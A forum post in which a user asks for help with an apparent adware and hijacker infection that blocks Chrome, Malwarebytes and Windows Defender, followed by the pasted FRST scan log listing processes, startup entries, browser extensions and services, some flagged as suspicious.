Jump to content

I THINK I'M INFECTED REAL BAD.


Recommended Posts

Good day, of recent after restarting my pc, i noticed i cannot open my chrome browsers, i started getting lots of ads pop up from my Internet explorer even when it's closed.

I usually use malwarebytes to scan my pc, but unfortunately it refuses to open, i keep getting this error message "windows cannot access the specific device, path, or file. You maynot have the appropriate permissions to access the item." Also when i try opening the windows defender.

After fruitless efforts to solve it i came across this forum.

 

I downloaded the malwarebytes as instructed and still get same error response.

I have done the scan with FRST and attached are the addtion.txt and frst.txt respectively.

Addition.txt

FRST.txt

Link to post
Share on other sites

FRST.TXT

 

Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version: 10.02.2019 01
Ran by #Strazzo.RoseGold## (administrator) on STRAZZOWEEZY (12-02-2019 07:09:07)
Running from C:\Users\Stanley\Downloads\FRST
Loaded Profiles: #Strazzo.RoseGold## (Available Profiles: #Strazzo.RoseGold## & RoseGold & Administrator)
Platform: Windows 8.1 Enterprise (Update) (X64) Language: English (United States)
Default browser: IE
Boot Mode: Normal
Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/

==================== Processes (Whitelisted) =================

(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)

(Hewlett-Packard Company) C:\Windows\System32\hpservice.exe
(LSI Corporation) C:\Program Files\LSI SoftModem\agr64svc.exe
(Apple Inc.) C:\Program Files\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
(Apple Inc.) C:\Program Files\Bonjour\mDNSResponder.exe
(Hewlett-Packard Company) C:\Program Files (x86)\Hewlett-Packard\Shared\HPDrvMntSvc.exe
(Hewlett-Packard Company) C:\Program Files (x86)\Hewlett-Packard\HP Hotkey Support\HPHotkeyMonitor.exe
(HP Inc.) C:\Program Files (x86)\HP\HP System Event\HPWMISVC.exe
(Iskysoft) C:\Program Files (x86)\iSkysoft\IAF\2.4.2.223\IsAppService.exe
(Microsoft Corporation) C:\Program Files (x86)\Common Files\Microsoft Shared\VS7DEBUG\MDM.EXE
( ) C:\Program Files\OpenVPN\bin\openvpnserv2.exe
(The OpenVPN Project) C:\Program Files\OpenVPN\bin\openvpnserv.exe
(The OpenVPN Project) C:\Program Files\OpenVPN\bin\openvpn.exe
(Apple Inc.) C:\Program Files (x86)\Common Files\Research In Motion\Tunnel Manager\mDNSResponder.exe
(The OpenVPN Project) C:\Program Files\OpenVPN\bin\openvpn.exe
(Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPEnhService.exe
(BlackBerry Limited) C:\Program Files (x86)\Common Files\Research In Motion\Tunnel Manager\tunmgr.exe
(The OpenVPN Project) C:\Program Files\OpenVPN\bin\openvpn.exe
(Hewlett-Packard Company) C:\Program Files (x86)\Hewlett-Packard\Shared\hpqwmiex.exe
(BlackBerry Limited) C:\Program Files (x86)\Common Files\Research In Motion\USB Drivers\BbDevMgr.exe
(Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPEnh.exe
(Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPHelper.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe
(Intel Corporation) C:\Windows\System32\igfxtray.exe
(Intel Corporation) C:\Windows\System32\hkcmd.exe
(Intel Corporation) C:\Windows\System32\igfxpers.exe
(Apple Inc.) C:\Program Files\iTunes\iTunesHelper.exe
(Skype Technologies S.A.) C:\Program Files (x86)\Microsoft\Skype for Desktop\Skype.exe
(BitTorrent Inc.) C:\Users\Stanley\AppData\Roaming\uTorrent Web\utweb.exe
(BitTorrent Inc.) C:\Users\Stanley\AppData\Roaming\uTorrent\uTorrent.exe
(Tonec Inc.) C:\Program Files (x86)\Internet Download Manager\IDMan.exe
(Apple Inc.) C:\Program Files\iPod\bin\iPodService.exe
(Apple Inc.) C:\Program Files (x86)\Common Files\Apple\Internet Services\iCloudServices.exe
(Apple Inc.) C:\Program Files (x86)\Common Files\Apple\Internet Services\AppleIEDAV.exe
(Skype Technologies S.A.) C:\Program Files (x86)\Microsoft\Skype for Desktop\Skype.exe
(Apple Inc.) C:\Program Files (x86)\Common Files\Apple\Internet Services\iCloudDrive.exe
(Apple Inc.) C:\Program Files (x86)\Common Files\Apple\Internet Services\ApplePhotoStreams.exe
(Apple Inc.) C:\Program Files (x86)\Common Files\Apple\Internet Services\iCloudPhotos.exe
(Microsoft Corporation) C:\Windows\System32\StikyNot.exe
(Skype Technologies S.A.) C:\Program Files (x86)\Microsoft\Skype for Desktop\Skype.exe
(Apple Inc.) C:\Program Files (x86)\Common Files\Apple\Apple Application Support\APSDaemon.exe
(BitTorrent Inc.) C:\Users\Stanley\AppData\Roaming\uTorrent\updates\3.5.5_44994\utorrentie.exe
(Skype Technologies S.A.) C:\Program Files (x86)\Microsoft\Skype for Desktop\Skype.exe
(BitTorrent Inc.) C:\Users\Stanley\AppData\Roaming\uTorrent\updates\3.5.5_44994\utorrentie.exe
(Tonec Inc.) C:\Program Files (x86)\Internet Download Manager\IEMonitor.exe
(Apple, Inc.) C:\Program Files (x86)\Common Files\Apple\Apple Application Support\secd.exe
(Google Inc.) C:\Program Files (x86)\Google\Update\1.3.33.23\GoogleCrashHandler.exe
(Google Inc.) C:\Program Files (x86)\Google\Update\1.3.33.23\GoogleCrashHandler64.exe
(HP Inc.) C:\Program Files (x86)\Hewlett-Packard\HP Support Solutions\HPSupportSolutionsFrameworkService.exe
() C:\Windows\windefender.exe
(Microsoft Corporation) C:\Program Files\WindowsApps\Microsoft.Office.OneNote_16.0.3327.1048_x64__8wekyb3d8bbwe\onenoteim.exe
(Microsoft Corporation) C:\Program Files\Internet Explorer\iexplore.exe
(Internet Download Manager, Tonec Inc.) C:\Program Files (x86)\Internet Download Manager\idmBroker.exe
(Microsoft Corporation) C:\Windows\System32\prevhost.exe

==================== Registry (Whitelisted) ===========================

(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

HKLM\...\Run: [iTunesHelper] => C:\Program Files\iTunes\iTunesHelper.exe [302904 2019-01-18] (Apple Inc. -> Apple Inc.)
HKLM\SOFTWARE\Policies\Microsoft\Windows Defender: Restriction <==== ATTENTION
HKU\S-1-5-21-1692593245-3285590566-2148222763-1001\...\Run: [Skype for Desktop] => C:\Program Files (x86)\Microsoft\Skype for Desktop\Skype.exe [53535296 2019-02-02] (Skype Software Sarl -> Skype Technologies S.A.)
HKU\S-1-5-21-1692593245-3285590566-2148222763-1001\...\Run: [OPENVPN-GUI] => C:\Program Files\OpenVPN\bin\openvpn-gui.exe [672384 2018-04-26] (OpenVPN Technologies, Inc. -> )
HKU\S-1-5-21-1692593245-3285590566-2148222763-1001\...\Run: [utweb] => C:\Users\Stanley\AppData\Roaming\uTorrent Web\utweb.exe [5216440 2018-04-24] (BitTorrent Inc -> BitTorrent Inc.)
HKU\S-1-5-21-1692593245-3285590566-2148222763-1001\...\Run: [uTorrent] => C:\Users\Stanley\AppData\Roaming\uTorrent\uTorrent.exe [1908920 2019-01-17] (BitTorrent Inc -> BitTorrent Inc.)
HKU\S-1-5-21-1692593245-3285590566-2148222763-1001\...\Run: [IDMan] => C:\Program Files (x86)\Internet Download Manager\IDMan.exe [3907152 2015-07-07] (Tonec Inc. -> Tonec Inc.)
HKU\S-1-5-21-1692593245-3285590566-2148222763-1001\...\Run: [IncrediMail] => C:\Program Files (x86)\IncrediMail\bin\IncMail.exe [444352 2018-06-10] (IncrediMail Inc. -> IncrediMail Ltd.)
HKU\S-1-5-21-1692593245-3285590566-2148222763-1001\...\Run: [RIMDeviceManager] => C:\Program Files (x86)\Common Files\Research In Motion\RIMDeviceManager\RIMDeviceManager.exe [2471672 2015-05-20] (BlackBerry Ltd. -> Research In Motion Limited)
HKU\S-1-5-21-1692593245-3285590566-2148222763-1001\...\Run: [iCloudServices] => C:\Program Files (x86)\Common Files\Apple\Internet Services\iCloudServices.exe [67384 2018-12-03] (Apple Inc. -> Apple Inc.)
HKU\S-1-5-21-1692593245-3285590566-2148222763-1001\...\Run: [AppleIEDAV] => C:\Program Files (x86)\Common Files\Apple\Internet Services\AppleIEDAV.exe [68408 2018-12-03] (Apple Inc. -> Apple Inc.)
HKU\S-1-5-21-1692593245-3285590566-2148222763-1001\...\Run: [iCloudDrive] => C:\Program Files (x86)\Common Files\Apple\Internet Services\iCloudDrive.exe [110392 2018-12-03] (Apple Inc. -> Apple Inc.)
HKU\S-1-5-21-1692593245-3285590566-2148222763-1001\...\Run: [ApplePhotoStreams] => C:\Program Files (x86)\Common Files\Apple\Internet Services\ApplePhotoStreams.exe [67896 2019-01-15] (Apple Inc. -> Apple Inc.)
HKU\S-1-5-21-1692593245-3285590566-2148222763-1001\...\Run: [iCloudPhotos] => C:\Program Files (x86)\Common Files\Apple\Internet Services\iCloudPhotos.exe [356664 2018-12-03] (Apple Inc. -> Apple Inc.)
HKU\S-1-5-21-1692593245-3285590566-2148222763-1001\...\Run: [RESTART_STICKY_NOTES] => C:\Windows\System32\StikyNot.exe [479744 2014-11-22] (Microsoft Windows -> Microsoft Corporation)
HKU\S-1-5-21-1692593245-3285590566-2148222763-1001\...\Run: [WitheredHill] => C:\Windows\rss\csrss.exe [4521472 2019-02-08] () <==== ATTENTION
HKU\S-1-5-21-1692593245-3285590566-2148222763-1001\...\Run: [CloudNet] => C:\Users\Stanley\AppData\Roaming\EpicNet Inc\CloudNet\cloudnet.exe [683008 2019-02-12] (EpicNet Inc.) <==== ATTENTION
HKU\S-1-5-21-1692593245-3285590566-2148222763-1001\...\MountPoints2: {2c5e9d22-76c0-11e8-825e-402cf4d8539a} - "C:\Windows\system32\RunDLL32.EXE" Shell32.DLL,ShellExec_RunDLL E:\start.exe
HKU\S-1-5-21-1692593245-3285590566-2148222763-1001\...\MountPoints2: {82ed0bf7-c8c3-11e8-8261-402cf4d8539a} - "E:\AutoRun.exe" 
HKU\S-1-5-21-1692593245-3285590566-2148222763-1001\...\MountPoints2: {82ed0c50-c8c3-11e8-8261-402cf4d8539a} - "E:\AutoRun.exe" 
HKU\S-1-5-21-1692593245-3285590566-2148222763-1001\...\MountPoints2: {82ed0d35-c8c3-11e8-8261-402cf4d8539a} - "E:\AutoRun.exe" 
HKU\S-1-5-18\...\Policies\Explorer: [NoLowDiskSpaceChecks] 1
HKU\S-1-5-18\...\Policies\Explorer: [LinkResolveIgnoreLinkInfo] 1
HKU\S-1-5-18\...\Policies\Explorer: [NoResolveSearch] 1
HKU\S-1-5-18\...\Policies\Explorer: [NoInternetOpenWith] 1
HKLM\...\Drivers32-x32: [msacm.iac2] => C:\Windows\SysWOW64\iac25_32.ax [197632 2013-08-22] (Intel Corporation)
HKLM\...\Drivers32-x32: [VIDC.GEOS] => C:\Windows\SysWOW64\GeoCodecD.dll [622592 2010-10-11] (GeoVision)
HKLM\Software\Microsoft\Active Setup\Installed Components: [OpenVPN_UserSetup] -> reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v OPENVPN-GUI /t REG_SZ /d "C:\Program Files\OpenVPN\bin\openvpn-gui.exe" /f
HKLM\Software\Microsoft\Active Setup\Installed Components: [{8A69D345-D564-463c-AFF1-A69D9E530F96}] -> C:\Program Files (x86)\Google\Chrome\Application\71.0.3578.98\Installer\chrmstp.exe [2018-12-18] (Google Inc -> Google Inc.)
HKLM\Software\Wow6432Node\Microsoft\Active Setup\Installed Components: [{73FA19D0-2D75-11D2-995D-00C04F98BBC9}] -> 
CHR HKLM\SOFTWARE\Policies\Google: Restriction <==== ATTENTION

==================== Internet (Whitelisted) ====================

(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)

Hosts: There are more than one entry in Hosts. See Hosts section of Addition.txt
Tcpip\..\Interfaces\{25D62E88-57F7-4879-91B3-0FBE5C8B4F71}: [DhcpNameServer] 1.1.1.1 1.0.0.1
Tcpip\..\Interfaces\{8BF038DF-16AA-4203-90BE-740E3461F3D4}: [DhcpNameServer] 192.168.8.1
Tcpip\..\Interfaces\{D14C4B82-5B48-498C-8F6E-81ADA12C1C8C}: [DhcpNameServer] 172.20.10.1
Tcpip\..\Interfaces\{D433F076-2F7D-4301-BE73-E8CE381871C0}: [DhcpNameServer] 192.168.8.1

Internet Explorer:
==================
HKU\S-1-5-21-1692593245-3285590566-2148222763-1001\Software\Microsoft\Internet Explorer\Main,Search Page = hxxps://%66%65%65%64.%73%6F%6E%69%63-%73%65%61%72%63%68.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGKBRGNclVS1AC6sNoGt0L7glATSfZxkIT3ysIwavywkdGdDMHHXXnjO9tg0XD9yKBCtOvz1LL_ReIEmCN-xJHRo9pam60eouPPD3a3O4qGVi5Es4iIR24Y7nh9akfPai5Q1OuzbONZLJRZFaqq_kxQ9Z-DCo_GGN5rXIyO8FSvytDaIXTrMcfHrh750Q&q={searchTerms}
HKU\S-1-5-21-1692593245-3285590566-2148222763-1001\Software\Microsoft\Internet Explorer\Main,Start Page = hxxps://%66%65%65%64.%68%65%6C%70%65%72%62%61%72.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGKBRGNclVS1AC6sNoGt0L7glATSfZxkIT3ysIwavywkdGdDMHHXXnjO9tg0XD9yKBCtOvz1LL_ReIEmCN-xJHRo9pam60eoicpfV_MriSUAQnsKvLWIZ4S1YS7CQyd2I9U6z0Wmnkj5s8T6U3A_ZCShl9ETmnnVUnHlDWcYqc1HesPtQHGIzTqr4X-kp
HKU\S-1-5-21-1692593245-3285590566-2148222763-1001\Software\Microsoft\Internet Explorer\Main,Start Page Redirect Cache = hxxp://www.msn.com/?ocid=iehp
SearchScopes: HKLM-x32 -> DefaultScope value is missing
SearchScopes: HKU\S-1-5-21-1692593245-3285590566-2148222763-1001 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = hxxp://yandex.ru/search/?win=331&clid=2100768&text={searchTerms}
SearchScopes: HKU\S-1-5-21-1692593245-3285590566-2148222763-1001 -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = hxxp://yandex.ru/search/?win=331&clid=2100768&text={searchTerms}
BHO: IDM integration (IDMIEHlprObj Class) -> {0055C089-8582-441B-A0BF-17B458C2A3A8} -> C:\Program Files (x86)\Internet Download Manager\IDMIECC64.dll [2015-07-08] (Tonec Inc. -> Internet Download Manager, Tonec Inc.)
BHO: No Name -> {D5FEC983-01DB-414A-9456-AF95AC9ED7B5} -> No File
BHO-x32: IDM integration (IDMIEHlprObj Class) -> {0055C089-8582-441B-A0BF-17B458C2A3A8} -> C:\Program Files (x86)\Internet Download Manager\IDMIECC.dll [2015-07-08] (Tonec Inc. -> Internet Download Manager, Tonec Inc.)
BHO-x32: No Name -> {D5FEC983-01DB-414A-9456-AF95AC9ED7B5} -> No File
IE Session Restore: HKU\S-1-5-21-1692593245-3285590566-2148222763-1001 -> is enabled.

FireFox:
========
FF ProfilePath: C:\Users\Stanley\AppData\Roaming\Mozilla\Firefox\Profiles\nahd6ha2.default [2019-02-10]
FF Homepage: Mozilla\Firefox\Profiles\nahd6ha2.default -> file:///C:/ProgramData/Quoteexs/ff.HP
FF NewTab: Mozilla\Firefox\Profiles\nahd6ha2.default -> file:///C:/ProgramData/Quoteexs/ff.NT
FF Extension: (Google Code Correction) - C:\Users\Stanley\AppData\Roaming\Mozilla\Firefox\Profiles\nahd6ha2.default\features\{5b8c6255-56bd-4974-a055-17773a870acc}\google-code-correction@mozilla.org.xpi [2018-05-21] [Legacy]
FF HKU\S-1-5-21-1692593245-3285590566-2148222763-1001\...\Firefox\Extensions: [mozilla_cc2@internetdownloadmanager.com] - C:\Users\Stanley\AppData\Roaming\IDM\idmmzcc7
FF Extension: (IDM integration) - C:\Users\Stanley\AppData\Roaming\IDM\idmmzcc7 [2018-09-23] [Legacy] [not signed]
FF HKU\S-1-5-21-1692593245-3285590566-2148222763-1001\...\SeaMonkey\Extensions: [mozilla_cc@internetdownloadmanager.com] - C:\Users\Stanley\AppData\Roaming\IDM\idmmzcc5
FF Extension: (IDM CC) - C:\Users\Stanley\AppData\Roaming\IDM\idmmzcc5 [2019-02-12] [Legacy] [not signed]
FF Plugin: @adobe.com/FlashPlayer -> C:\Windows\system32\Macromed\Flash\NPSWF64_20_0_0_286.dll [2016-01-19] ()
FF Plugin: @videolan.org/vlc,version=3.0.3 -> C:\Program Files\VideoLAN\VLC\npvlc.dll [2019-01-10] (VideoLAN)
FF Plugin: @videolan.org/vlc,version=3.0.4 -> C:\Program Files\VideoLAN\VLC\npvlc.dll [2019-01-10] (VideoLAN)
FF Plugin: @videolan.org/vlc,version=3.0.6 -> C:\Program Files\VideoLAN\VLC\npvlc.dll [2019-01-10] (VideoLAN)
FF Plugin-x32: @adobe.com/FlashPlayer -> C:\Windows\SysWOW64\Macromed\Flash\NPSWF32_20_0_0_286.dll [2016-01-19] ()
FF Plugin-x32: @RIM.com/WebSLLauncher,version=1.0 -> C:\Program Files (x86)\Common Files\Research In Motion\BBWebSLLauncher\NPWebSLLauncher.dll [2015-05-22] ()
FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.33.23\npGoogleUpdate3.dll [2018-12-17] (Google Inc.)
FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.33.23\npGoogleUpdate3.dll [2018-12-17] (Google Inc.)

Chrome: 
=======
CHR DefaultProfile: Profile 3
CHR Session Restore: Profile 3 -> is enabled.
CHR Profile: C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Backup Default [2019-02-08]
CHR Extension: (chrome_filter) - C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Backup Default\Extensions\iaoamimahmkdnfhcooffilicogppjebo [2019-02-08]
CHR Extension: (Email Hunter) - C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Backup Default\Extensions\igpjommeafjpifagkfhebdbofcokbhcb [2018-06-15]
CHR Extension: (IDM Integration Module) - C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Backup Default\Extensions\ngpampappnmepgilojfohadhhmbhlaek [2018-11-08]
CHR Extension: (Chrome Web Store Payments) - C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Backup Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2018-06-12]
CHR Extension: (Chrome Media Router) - C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Backup Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2018-11-08]
CHR Profile: C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Profile 1 [2019-02-08]
CHR Extension: (Slides) - C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2018-05-04]
CHR Extension: (Docs) - C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\aohghmighlieiainnegkcijnfilokake [2018-05-04]
CHR Extension: (Google Drive) - C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\apdfllckaahabafndbhieahigkjlhalf [2018-10-23]
CHR Extension: (YouTube) - C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2018-05-04]
CHR Extension: (Serpdigger - 1st Email Extractor) - C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\clpkfpkkbjjplgkblpjkkfddbbkipokl [2019-01-22]
CHR Extension: (Яндекс) - C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\cncgohepihcekklokhbhiblhfcmipbdh [2018-05-04]
CHR Extension: (Sheets) - C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2018-05-04]
CHR Extension: (Google Docs Offline) - C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2018-08-26]
CHR Extension: (chrome_filter) - C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\iaoamimahmkdnfhcooffilicogppjebo [2019-02-08]
CHR Extension: (Email Hunter) - C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\igpjommeafjpifagkfhebdbofcokbhcb [2019-01-10]
CHR Extension: (IDM Integration Module) - C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\ngpampappnmepgilojfohadhhmbhlaek [2019-01-10]
CHR Extension: (Chrome Web Store Payments) - C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2018-05-04]
CHR Extension: (Gmail) - C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2018-05-04]
CHR Extension: (Chrome Media Router) - C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2019-01-22]
CHR Profile: C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Profile 2 [2019-02-08]
CHR Extension: (Slides) - C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Profile 2\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2018-06-07]
CHR Extension: (Docs) - C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Profile 2\Extensions\aohghmighlieiainnegkcijnfilokake [2018-06-07]
CHR Extension: (Google Drive) - C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Profile 2\Extensions\apdfllckaahabafndbhieahigkjlhalf [2018-10-27]
CHR Extension: (YouTube) - C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Profile 2\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2018-06-07]
CHR Extension: (Яндекс) - C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Profile 2\Extensions\cncgohepihcekklokhbhiblhfcmipbdh [2018-06-07]
CHR Extension: (Sheets) - C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Profile 2\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2018-06-07]
CHR Extension: (Google Docs Offline) - C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Profile 2\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2018-08-25]
CHR Extension: (Hunter: Find email addresses in seconds) - C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Profile 2\Extensions\hgmhmanijnjhaffoampdlllchpolkdnj [2019-01-30]
CHR Extension: (chrome_filter) - C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Profile 2\Extensions\iaoamimahmkdnfhcooffilicogppjebo [2019-02-08]
CHR Extension: (Email Hunter) - C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Profile 2\Extensions\igpjommeafjpifagkfhebdbofcokbhcb [2019-01-16]
CHR Extension: (IDM Integration Module) - C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Profile 2\Extensions\ngpampappnmepgilojfohadhhmbhlaek [2019-01-16]
CHR Extension: (Chrome Web Store Payments) - C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Profile 2\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2018-06-07]
CHR Extension: (Gmail) - C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Profile 2\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2018-06-07]
CHR Extension: (Chrome Media Router) - C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Profile 2\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2019-01-22]
CHR Profile: C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Profile 3 [2019-02-08]
CHR Extension: (Slides) - C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Profile 3\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2018-06-07]
CHR Extension: (Docs) - C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Profile 3\Extensions\aohghmighlieiainnegkcijnfilokake [2018-06-07]
CHR Extension: (Google Drive) - C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Profile 3\Extensions\apdfllckaahabafndbhieahigkjlhalf [2018-06-07]
CHR Extension: (YouTube) - C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Profile 3\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2018-06-07]
CHR Extension: (Яндекс) - C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Profile 3\Extensions\cncgohepihcekklokhbhiblhfcmipbdh [2018-06-07]
CHR Extension: (Sheets) - C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Profile 3\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2018-06-07]
CHR Extension: (Google Docs Offline) - C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Profile 3\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2018-09-06]
CHR Extension: (chrome_filter) - C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Profile 3\Extensions\iaoamimahmkdnfhcooffilicogppjebo [2019-02-08]
CHR Extension: (Email Hunter) - C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Profile 3\Extensions\igpjommeafjpifagkfhebdbofcokbhcb [2019-01-10]
CHR Extension: (IDM Integration Module) - C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Profile 3\Extensions\ngpampappnmepgilojfohadhhmbhlaek [2019-01-10]
CHR Extension: (Bazz Search SafeFinder) - C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Profile 3\Extensions\nmeinlfojlcegblpogpjbhipmonclejh [2019-02-05]
CHR Extension: (Chrome Web Store Payments) - C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Profile 3\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2018-06-07]
CHR Extension: (Gmail) - C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Profile 3\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2018-06-07]
CHR Extension: (Chrome Media Router) - C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Profile 3\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2019-01-22]
CHR Profile: C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\System Profile [2019-02-08]
CHR Extension: (chrome_filter) - C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\System Profile\Extensions\iaoamimahmkdnfhcooffilicogppjebo [2019-02-08]
CHR HKLM\...\Chrome\Extension: [ngpampappnmepgilojfohadhhmbhlaek] - C:\Program Files (x86)\Internet Download Manager\IDMGCExt.crx [2015-07-10]
CHR HKLM-x32\...\Chrome\Extension: [cncgohepihcekklokhbhiblhfcmipbdh] - hxxp://clients2.google.com/service/update2/crx
CHR HKLM-x32\...\Chrome\Extension: [ngpampappnmepgilojfohadhhmbhlaek] - C:\Program Files (x86)\Internet Download Manager\IDMGCExt.crx [2015-07-10]

Opera: 
=======
OPR StartupUrls: "hxxp://www.yandex.ru/?win=331&clid=2100767"
OPR Extension: (chrome_filter) - C:\Users\Stanley\AppData\Roaming\Opera Software\Opera Stable\Extensions\iaoamimahmkdnfhcooffilicogppjebo [2019-02-08]

==================== Services (Whitelisted) ====================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

R2 AgereModemAudio; C:\Program Files\LSI SoftModem\agr64svc.exe [42096 2015-08-05] (Avago Technologies U.S. Inc. -> LSI Corporation)
R2 Apple Mobile Device Service; C:\Program Files\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe [85304 2018-10-16] (Apple Inc. -> Apple Inc.)
S3 aspnet_state; C:\Windows\Microsoft.NET\Framework\v1.1.4322\aspnet_state.exe [32768 2004-07-15] (Microsoft Corporation) [File not signed]
R3 BlackBerry Device Manager; C:\Program Files (x86)\Common Files\Research In Motion\USB Drivers\BbDevMgr.exe [588024 2014-10-31] (BlackBerry Ltd. -> BlackBerry Limited)
S3 CommuniGate Pro Messaging Server; C:\Windows\CommuniGatePro\CGStarter.exe [38552 2017-02-14] (CommuniGate Systems -> )
R2 hpHotkeyMonitor; C:\Program Files (x86)\Hewlett-Packard\HP Hotkey Support\hpHotkeyMonitor.exe [684624 2015-06-23] (Hewlett-Packard -> Hewlett-Packard Company)
S3 hpqcaslwmiex; C:\Program Files (x86)\HP\Shared\hpqwmiex.exe [1031704 2016-06-03] (Hewlett-Packard Company -> HP)
R2 HPSupportSolutionsFrameworkService; C:\Program Files (x86)\Hewlett-Packard\HP Support Solutions\HPSupportSolutionsFrameworkService.exe [347512 2018-12-06] (HP Inc. -> HP Inc.)
R2 HPWMISVC; C:\Program Files (x86)\HP\HP System Event\HPWMISVC.exe [606224 2016-04-19] (Hewlett-Packard Company -> HP Inc.)
R2 IsAppService; C:\Program Files (x86)\Iskysoft\IAF\2.4.2.223\IsAppService.exe [473352 2017-03-30] (Shenzhen Yi Xing Investment Co., Ltd. -> Iskysoft)
R2 OpenVPNService; C:\Program Files\OpenVPN\bin\openvpnserv2.exe [24192 2018-03-06] (OpenVPN Technologies, Inc. ->  )
R2 OpenVPNServiceInteractive; C:\Program Files\OpenVPN\bin\openvpnserv.exe [75392 2018-04-26] (OpenVPN Technologies, Inc. -> The OpenVPN Project)
R2 OpenVPNServiceLegacy; C:\Program Files\OpenVPN\bin\openvpnserv.exe [75392 2018-04-26] (OpenVPN Technologies, Inc. -> The OpenVPN Project)
R2 RIM MDNS; C:\Program Files (x86)\Common Files\Research In Motion\Tunnel Manager\mDNSResponder.exe [396024 2015-05-26] (BlackBerry Ltd. -> Apple Inc.)
